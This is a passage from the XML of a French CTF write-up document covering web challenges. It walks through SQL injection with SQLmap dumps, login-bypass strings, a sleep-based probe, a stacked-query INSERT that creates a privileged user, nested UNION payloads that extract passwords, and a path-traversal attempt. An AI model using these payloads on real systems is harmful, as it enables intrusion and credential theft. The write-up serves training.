        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>En fournissant les bonnes options à SQLmap telles que le type de base de données, ici SQLITE, on peut détecter une injection SQL de type UNION. Avec l’option “dump”, l’outils va automatiquement récupérer toute la base de données.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attention </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">: SQLMap est un outils assez intrusif, à la fin du CTF nous avions plus de 10 GO de logs sur la machines hébérgeant les challenges. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Database: SQLite_masterdb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Table: users  [3 entries]</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pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>| id | username | password               |</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1  | admin    | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Auth_SqL_1s_s0000_w34k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> |</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rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLMap nous ressort la base de données et on peut utiliser les identifiants de l’admin pour se connecter et valider le challenge avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ese{Auth_SqL_1s_s0000_w34k}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:p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1" w:name="_Toc575153864"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>WEB 100 - Super Query Login v1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>La suite d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>’une série d’injection SQL avec un champ de connexion. On se connecte avec une injection classique:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>‘or 1=1 limit 1 #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>On est connecté mais on nous indique que nous n’avons pas le rang nécessaire (rang = 0).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>On essaie de se connecter sur d’autres comptes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">‘or 1=1 limit 1,2 # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mais aucun compte ne semble avoir le rang recqui. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>On va essayer de faire une requête à la suite de la requête principale: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rPr>
              <w:t xml:space="preserve">SELECT something FROM table WHERE something = ‘$username’ AND something =’ $password’ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>DEUXIEME_REQUETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On injecte donc avec: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">‘ and sleep(5) # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>On remarque que le chargement de la page est beaucoup plus long que la normal du fait de la pause demandée via l’injection à MySQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>La suite de notre exploitation va consister à ajouter un nouvel utilisateur dans la base de données avec le rang adéquat.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Pour faciliter l’exploitation on peut passer par sqlmap afin de récupérer la table contenant les utilisateurs et les colonnes de celle-ci.</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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>La faille est exploitable en blind avec RLIKE, on récupère ce dont on a besoin:</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4 --dbs</w:t>
            </w:r>
          </w:p>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4 -D “challenges” --tables</w:t>
            </w:r>
          </w:p>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4 -D “challenges” -T “web3_users” --columns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>On a alors une table web3_users avec les colonnes: id, password, rank et username.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Notre injection pour ajouter un nouvel utilisateur se résume alors à:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Login=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>‘ ; INSERT INTO web3_users(id, username, password, rank) VALUES (987, ‘bob’, ‘bob’, 1) #</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On se connecte avec le compte créé et on obtient le flag: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ESE{St4cKeD_Qu3rIeS}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc1000827590"/>
      <w:r>
        <w:t>WEB 150 - La route est longue</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>On a une nouvelle injection SQL avec le code source de l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>’épreuve.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>On a deux requetes SQL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1">
                <w14:lumMod w14:val="65000"/>
                <w14:lumOff w14:val="35000"/>
              </w14:schemeClr>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>$q = "select id from users where login = '". $login ."'";</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1">
                <w14:lumMod w14:val="65000"/>
                <w14:lumOff w14:val="35000"/>
              </w14:schemeClr>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Où $login est un champ utilisateur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1">
                <w14:lumMod w14:val="65000"/>
                <w14:lumOff w14:val="35000"/>
              </w14:schemeClr>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>$q = "select email from admin_list where id_user = $id";</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1">
                <w14:lumMod w14:val="65000"/>
                <w14:lumOff w14:val="35000"/>
              </w14:schemeClr>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Où $id est le résultat de la requete précédente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Ici nous sommes en présence d’une base de données SQLITE il nous est donc assez difficile de faire une injection basée sur le temps (bien que ce soit possible en soumettant une requete qui réalise plusieurs calculs).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">L’idée ici est d’injecter dans le champs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">login </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>pour injecter la seconde requete.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>‘union all select “-1 union all select ‘toto’” -- a-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">La page nous retourne </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">toto </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>qui correspond à l’email récupérée dans la 2ème requete SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On récupère le mot de passe du premier utilisateur dans la table </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>users:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>union all select "0 union all select password from users limit 0,1"-- a-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Le flag: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1">
                <w14:lumMod w14:val="65000"/>
                <w14:lumOff w14:val="35000"/>
              </w14:schemeClr>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>ese{time_Or_Routed?}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>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3" w:name="_Toc532990925"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>WEB 200 - Glob Secret Manager</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-19050</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>251460</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1661795" cy="1877695"/>
            <wp:effectExtent l="0" t="0" r="5080" b="8255"/>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pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1661795" cy="1877695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Le challenge est une interface web permettant d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>’accéder à des fichiers confidentiels, on peut cliquer sur le bouton “Enter” et les fichiers secret 1 et 2 apparaissent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>On peut les afficher en les accédant via l’URL :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>- Secret 1 avec URL + ‘/secret/secret 1’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>- Secret 2 avec URL + ‘/secret/secret 2’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">L’un des secrets contient la string suivante “Confidential Secret are hidden”. Il doit donc y avoir des fichiers cachés récupérables. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Pour le moment cette méthode reste une impasse, il est néçessaire de trouver autre chose. On essaie de changer les paramètres dans l’url pour se déplacer dans les dossiers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>http://localhost/ESE%20WEB%20XX%20-%20Glob-Secrets-Manager/index.php?url=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>../secret</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>On reçoit le message d’erreur suivant, apparemment la valeur n’est pas gérée correctement.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Fatal error: Uncaught exception 'UnexpectedValueException' with message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'DirectoryIterator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
